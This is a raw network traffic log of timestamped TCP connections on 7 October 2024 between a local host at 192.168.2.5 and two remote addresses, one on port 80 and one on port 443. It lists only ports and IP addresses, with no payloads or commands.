Oct 7, 2024 03:15:36.343451023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.343465090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.343466997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.343485117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.343488932 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.343508005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.343528032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.343544960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.344127893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.344156981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.344176054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.344188929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.344202995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.344208956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.344219923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.344228029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.344237089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.344249010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.344254971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.344265938 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.344297886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.344297886 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.344355106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.344371080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.344387054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.344404936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.344407082 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.344420910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.344427109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.344436884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.344451904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.344451904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.344455004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.344470978 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.344505072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.344505072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.345124960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.345141888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.345170975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.345181942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.345186949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.345202923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.345204115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.345222950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.345225096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.345242023 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.345251083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.345268011 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.345267057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.345267057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.345287085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.345287085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.345304966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.345310926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.345324039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.345330000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.345339060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.345350981 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.345369101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.345412016 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.365902901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.365952969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.366111994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.366111994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.369383097 CEST	443	49812	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.369774103 CEST	49812	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.369793892 CEST	443	49812	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.370224953 CEST	49812	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.370230913 CEST	443	49812	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.397116899 CEST	443	49810	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.397264004 CEST	443	49810	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.397588968 CEST	49810	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.397588968 CEST	49810	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.397589922 CEST	49810	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.400517941 CEST	49815	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.400568962 CEST	443	49815	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.400665045 CEST	49815	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.400805950 CEST	49815	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.400825024 CEST	443	49815	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.411456108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.411495924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.411665916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.411751032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.417099953 CEST	443	49811	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.417129040 CEST	443	49811	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.417169094 CEST	443	49811	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.417195082 CEST	49811	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.417248011 CEST	49811	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.417668104 CEST	49811	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.417700052 CEST	443	49811	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.417746067 CEST	49811	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.417756081 CEST	443	49811	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.420123100 CEST	49816	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.420152903 CEST	443	49816	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.420247078 CEST	49816	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.420382023 CEST	49816	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.420396090 CEST	443	49816	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.431241035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.431296110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.431309938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.431356907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.431371927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.431456089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.431456089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.431457043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.431457043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.431457043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.431523085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.431538105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.431561947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.431577921 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.431591988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.431600094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.431607962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.431627035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.431643963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.431674004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452241898 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452264071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452280045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452297926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452326059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452361107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452378035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452394962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452589035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452589035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452589989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452589989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452608109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452636003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452666998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452673912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452673912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452675104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452683926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452701092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452704906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452723980 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452725887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452744007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452745914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452758074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452764988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452775955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452786922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452794075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452804089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452821970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452836990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452838898 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452857018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452864885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452877045 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452882051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452897072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452905893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452914953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.452927113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452948093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452965021 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.452980042 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453013897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453030109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453037977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453062057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453066111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453085899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453118086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453119993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453135967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453152895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453166962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453186989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453187943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453208923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453226089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453257084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453273058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453286886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453313112 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453334093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453339100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453339100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453365088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453380108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453388929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453413963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453433990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453469038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453469992 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453491926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453526020 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453535080 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453547001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453552961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453591108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453593016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453608990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453610897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453625917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453649044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453665972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453670025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453680992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453689098 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453696012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453722954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453743935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453905106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453933001 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453953028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453965902 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453969955 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.453985929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.453986883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.454013109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.454013109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.454051018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.457837105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.457865953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.457880020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.457912922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.457912922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.457933903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.457945108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.457961082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.457976103 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.457992077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458002090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458014965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458029032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458029985 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458040953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458048105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458056927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458069086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458072901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458087921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458098888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458106041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458117008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458125114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458133936 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458151102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458151102 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458168030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458169937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458185911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458189011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458208084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458224058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458241940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458492041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458508015 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458524942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458554983 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458554983 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458586931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458621025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458636999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458652973 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458668947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458683968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458684921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458684921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458704948 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458713055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458724976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458740950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458745003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458758116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458762884 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458775997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458798885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458803892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458818913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458827972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458839893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458844900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458861113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458861113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458878994 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.458882093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458905935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458905935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.458925009 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459000111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459055901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459134102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459150076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459165096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459182978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459192038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459212065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459218979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459218979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459228039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459238052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459244967 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459258080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459274054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459274054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459292889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459300995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459316969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459326029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459331989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459348917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459352970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459372044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459374905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459403038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459418058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459419966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459419966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459420919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459434986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459449053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459454060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459467888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459470987 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459486008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459486961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459501028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459502935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459520102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459536076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.459552050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459552050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459552050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459577084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.459594965 CEST	49782	80	192.168.2.5	95.164.90.97
